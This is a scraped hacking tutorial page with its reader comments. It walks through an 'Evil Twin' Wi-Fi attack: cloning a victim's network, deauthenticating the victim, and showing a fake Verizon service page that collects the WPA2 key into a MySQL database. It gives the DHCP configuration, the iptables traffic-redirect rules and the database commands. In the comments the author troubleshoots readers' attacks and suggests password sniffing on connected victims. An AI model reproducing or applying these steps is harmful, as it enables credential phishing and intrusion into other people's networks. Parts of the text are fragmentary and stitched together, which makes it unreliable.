Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
forcing.
On this technique, named Evil Twin, we take a different perspective to the attack.
Using a powerful long range wireless card (Alfa AWUS036NH), we clone the target
network to confuse our victim. Then, we deauthenticate the victim from his own
wireless network and wait until he connects to our access point which looks exactly
like his.
When the victim connects, he is redirected to a service page asking for the WPA-2
key in order to access the internet. As soon as we get the key, you can either allow
the victim to use the network (maybe improvise some password sniffing?) or just
bring it down manually.
For this example I created a service page based on Verizon ISP. The files are placed at
the default location (/var/www/). I created a database called wpa2, which can be
done with the following commands:
Login to MySQL:
mysql -u root -p
Finally, start apache and mysql services and check everything works, by going typing
localhost on a web-browser.
Commands:
/etc/dhcp3/dhcpd.conf:
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}
Flush iptables:
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface [internet connection]
-j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
Redirect traffic:
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [IP
address:80]
iptables -t nat -A POSTROUTING -j MASQUERADE
COMMENTS
113 comments
Hey sickee!
I uploaded the post and added the download link. The files can be copied and
pasted on to the /var/www/ folder. Once thats done, start Apache and MySQL from
the services menu, and go type localhost to test it in a web browser.
Let me know how it goes, or contact me in IRC (freenode.net). Nick: deathcorps
Take care
REPLY
Hey otlin, the article has been updated. There were too commands prior to that
missing, which were:
create database wpa2;
use wpa2;
and finally:
create table content(key1 VARCHAR(64), key2 VARCHAR(64));
Try that out and it should work.
Thanks for the feedback!
REPLY
otlin (270 days)
Good day,
thank for your prompt reply. I checked as you told and it worked. However I tried to
start your page as localhost on a web-browser, but it doesnt work. I had put all files
from folder verison to folder www. Apache and MySQL had been started before
working with web-browser, but I could see only this
It works!
This is the default web page for this server.
The web server software is running but no content has been added, yet..
And I have one more question, I am beginner in working with LINUX, and I ask, if
possible to create BASH script for automatic entering all commands which were
given by you. Please advise.
Take care
REPLY
It works!
This is the default web page for this server.
The web server software is running but no content has been added, yet..
All the best
REPLY
=====
admin
why this error message come to my display can u explain to me please????
REPLY
mysql -u root -p
Note: Default backtrack user/pass are root/toor
Create the database:
create database wpa2;
use wpa2;
create table content(key1 VARCHAR(64), key2 VARCHAR(64));
but my question for admin is:
im facing problems in watching video,how would i check the table to see
passwords ?
REPLY
admin (263 days)
@darkey
You have successfully created the database. However , youre database is still
empty. That means nobody entered a pass at the service page.
You can see this from the line: Empty set (0.00 sec)
Try accessing your page and enter a value yourself to make sure it works properly!
REPLY
REPLY
mysql>
i type the password but in nothin appears plz help me
im algerian sorry my english is not strong
help me teacher
REPLY
the fake web page from my own machine it worked. I were able to connect to the
fake access point from the test target client machine. However when I tried to access
the fake web page from the test target client machine I got web page can not be find
as when you are not connected to internet.
REPLY
admin (245 days)
As much as I would love to agree, this isnt true.
I have tried version 1.0 with bad results. Turns out one of the biggest providers in
US (verizon) uses routers deactivated WPS by default.
Furthermore, large enterprise networks will never have WPS enabled, which makes
evil twin method perfect for the scenario.
Besides that, I really liked the concept of reaver and am looking forward to try it
again! Just waiting for a stable release.
Hopefully a stable version will come out before the router manufacturers patch an
update to disable WPS by default.
REPLY
admin (226 days)
Oh boy, this sounds insanely ingenious!
Just how I like it!
Any chance you can send this to my email at technicdynamic@gmail.com ?
If you could specify the purpose on each step also, that would be awesome Im
looking into developing a part two of this tutorial.
Even though we have Reaver now (if you noticed, my video came out slightly
before reaver was publicly released), Im sure all the hackers like to have an extra
card up their sleeve.
Take care John!
REPLY
}
^
Configuration file errors encountered exiting
root@bt:~#
*i have installed the dhcp3-server but i dont find him in /var/run/
can u help me?
REPLY
It was a typo on my fault, I missed a semi-colon at line 10, like the error says.
You can just insert a semi-colon (;) at line 10 or copy and paste from the website
into the dhcpd.conf file since it is now updated.
This is the line in question, it was like this:
range 192.168.2.130 192.168.2.140
Should be like this:
range 192.168.2.130 192.168.2.140;
Thank you!
REPLY
REPLY
Boody (232 days)
Hi Admin,
First of all, i would like to thank you alot for this great video!! then, i have a question,
everything went great and working, but when i connect with my other laptop to the
cloned network i get connection but limited or no connectivity so when i try to visit
any website it doesnt redirect me to verizon page, it just gives me server not found,
is there a solution for this?
And one more question what is that that you posted at the bottom of the page where
to use it You may use these HTML tags and attributes:
REPLY
Hope I helped in some way and if you still have the problem, let me know. Im
thinking of working on a forum due to the amount of questions, I know it gets hard
to even find my reply since theres so many comments.
Take care boody
REPLY
REPLY
You might find that something else is happening with the packets, maybe their
being sent somewhere where their not supposed to be sent?
Give it a try and let us know!
Take care buddy!
REPLY
doctorK (226 days)
tnx for replay admin
yes i can see the fake AP whit the client but i cant connect it
ive a good signal
what about ifconfig
i made everything that you sed in the tutorial
bye
REPLY
We have two interfaces right, one is connected to the internet and the other one is
the wireless interface used to create the access point.
So lets say youre connected to the internet via cable (eth0). In that case you issue
the command ifconfig and look over there, you should see your IP address.
Starting apache is easy, already comes pre-installed in Backtrack.
Go to the menu:
Backtrack > Services > HTTP
Hope it helps!
REPLY
, its really
, which i liked too much and really thanks for sharing , but bro
i have one little problem which is really wierd , i DID everything perfectly and i got it
without any errors but when i try to connect to my new access point , which is
unsecured using another pc i cant connect to it , i get a unable to connect to AP ,
so what do you think the problem is is it from my Wireless device , iam not sure , i
have Atheros AR9170 which is supported with aircrack suite , but i saw in ur video u
use 2 interfaces while setting some options u used wlan0 and next time wlan2 , but i
only have one interface which i used in the two settings which is wlan0 , just watned
to mention that so u can help me
reading my problem
Ali.
REPLY
The reason I use two interfaces is because after obtaining the key we can usually
make good use of the created access point to implement password sniffing and
such without need of arp poisoning.
Is there no other way you can use an interface for internet? I have a rooted android
that I create access point for internet. You can always use eth0 as well.
Take care
REPLY
austin316 (209 days)
can you please tell me where this came from 00:12:23:34:45:56
if we dont use -a option then the clone network will automatically use the MAC of the
interface that is on mon0
one more question ,what IP should i use , where exatly yours came from?
REPLY
admin (207 days)
The /etc/dhcp3/dhcpd.conf should actually be different than your wlan settings,
just copy and paste from article above.
Double check on your wlan interface just to make sure it doesnt interfere with the
192.168.2.0/24 subnet.
To delete the network you just bring airbase down. On the terminal where you
opened it, just hold ctrl and press c and you wont see it in wireless aps
anymore.
Take care
REPLY
Max (183 days)
iptables -t nat -A PREROUTING -p tcp dport 80 -j DNAT to-destination [IP
address:80]
am in college wifi and i dont know what ip address to be entered please help.
REPLY
Here is why this method will never work.The client has stored a profile connecting to
that WPA encrypted wi-fi network.IT IS ENCRYPTED.its is not a open network.SO
whenever the client tries to communicate with the AP all of its DATA packets will be
encrypted.So you are setting up EVIL TWIN that can not decode the encrypted data
packets of the client, because you do not know the WPA key.So the client will drop the
connection.
Practically client can only authenticate and associate with your evil twin AP.It will not
be able to communicate with it.
That method would work only if the AP has no encryption.Client will send DATA
packets unencrypted and it will be able to communicate with the AP showing it up
the captive web page portal.
REPLY
i have a problem redirecting the traffic i dont get the verzion that
i downloaded it because when i try connecting with it it says limited access and i dont
get redirect to the apache server
btw how do i know the ip that i want to redirect the traffic to?
you just put na random number without telling us how you choose it?
REPLY
REPLY
Me (150 days)
Yeah, but why not take a weaker encryption algorithm like web or one of the many
many wpa2 variants (including wpa radius and wpa md5) as fake access point and let
the user enter their password the NORMAL WAY and crack the encrypted but weaker
encrypted than wpa2 aes password, that you will get back from the client when he
tries to enter his password the *normal* way.
REPLY
I did improve this method a bit by using airbase instead of the manual config and
other details as the post is almost a year old.
But will take a look into creating the md5 access point.
REPLY
matt (147 days)
I have the same problem arminaven, everything seems to be working ok, when i type
localhost in the attacker computer everything works great.When i try to connect to
the AP with the victems computer, its doesnt let me connect. ANybody got any
ideas???
Thanks
REPLY
3) ISP isnt needed per se but it is good practice to save the victim BSSID on a
MAC address it works like this [XX:XX:XX] the first 3 pairs represent the company
so if you know the company it becomes easier to guess the ISP (only verizon uses
that router model for example) the last 3 pairs represent model.
Im gonna skip to this:
After many comments and suggestions (almost 100 comments only on this page!),
and a lot of people having issues, I decided to make a script to automate this
I know Im not answering your specific question and Im sorry.
Hopefully it will help you understand it better once you see how the script works.
Expect it before end of the month! =)
Cheers!
REPLY
bud (124 days)
Hey admin.
I have runed the ifconfig and took;
root@root:~# ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:579 errors:0 dropped:0 overruns:0 frame:0
TX packets:579 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:71001 (71.0 KB) TX bytes:71001 (71.0 KB)
wlan0 Link encap:Ethernet HWaddr d8:5d:4c:90:5f:c2
inet addr:192.168.1.50 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::da5d:4cff:fe90:5fc2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:14006 errors:0 dropped:0 overruns:0 frame:0
TX packets:2940 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4874931 (4.8 MB) TX bytes:314334
WHICH CORRECTION COULD BE MADE IN -gedit /etc/dhcp3/dhcpd.confWHICH YOU HAVE WROTE AS BELOW;
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}
THANKS FOR YOUR TIME !
REPLY
This is great tutorial but could you tell me please do you need to be connected to the
internet in the first place in order to crack it. Is it possible to do that without being
connected to the net help me please.
Thanks
REPLY